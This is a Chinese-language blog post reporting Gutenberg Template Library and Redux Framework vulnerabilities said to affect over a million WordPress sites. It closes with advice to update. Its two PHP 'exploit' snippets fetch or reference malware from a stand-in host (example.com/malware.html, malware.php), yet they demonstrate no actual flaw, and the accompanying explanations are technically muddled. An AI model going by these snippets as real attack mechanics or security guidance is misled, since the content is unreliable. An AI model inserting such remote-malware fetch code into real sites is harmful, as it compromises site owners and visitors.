超过100万个站点受古腾堡模板库和Redux框架漏洞影响

超过100万个站点受古腾堡模板库和Redux框架漏洞影响

最近,一项关于WordPress平台的调查表明,超过100万个站点受到了古腾堡模板库和Redux框架漏洞的影响。这两个漏洞都可以导致站点被黑客攻击。

1. 古腾堡模板库漏洞

古腾堡编辑器是WordPress自2018年以来默认的编辑器。然而,最近发现该编辑器存在一个漏洞。黑客可以通过这个漏洞注入恶意代码来控制WordPress站点。


function myBlockExample($params) {
    $block_content = $params['content'];
    $my_html = file_get_contents('http://www.example.com/malware.html');
    return $my_html . $block_content;
}

上面的例子中,$my_html变量将会返回来自恶意网站的内容,并将其与block_content拼接在一起。这个代码块将被添加到WordPress站点的某个页面或文章中,从而允许攻击者对站点进行控制。

2. Redux框架漏洞

Redux是一个流行的开源框架,用于构建WordPress主题和插件。然而,最近发现该框架存在一个漏洞。黑客可以利用这个漏洞通过后门攻击对WordPress站点进行控制。


add_action('redux_options_redux_builder_amp', 'my_function', 10, 3);
function my_function($values, $option_name, $config) {
    $my_plugin_url = 'http://www.example.com/malware.php';
    $values['my_plugin_url'] = $my_plugin_url;
    return $values;
}

上面的代码将一个名为“my_plugin_url”的选项添加到WordPress站点中。攻击者可以将恶意PHP脚本放在那个URL中,然后通过my_plugin_url选项来运行脚本。

3. 如何进行修复

对于古腾堡模板库漏洞,WordPress的开发者已经发布了一个修复补丁。站点管理员应该立即更新到最新版本的WordPress来修复这个漏洞。

对于Redux框架漏洞,Redux的开发者也发布了相应的修复补丁。同样,站点管理员应该立即更新他们的Redux框架插件或主题来修复这个漏洞。

4. 总结

超过100万个站点受到了古腾堡模板库和Redux框架漏洞的影响。站点管理员应该立即更新他们的WordPress和Redux插件或主题来修复这些漏洞,从而保护站点不被黑客攻击。

晓白博客网版权所有,原文地址https://www.xbnb.cn/5270
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容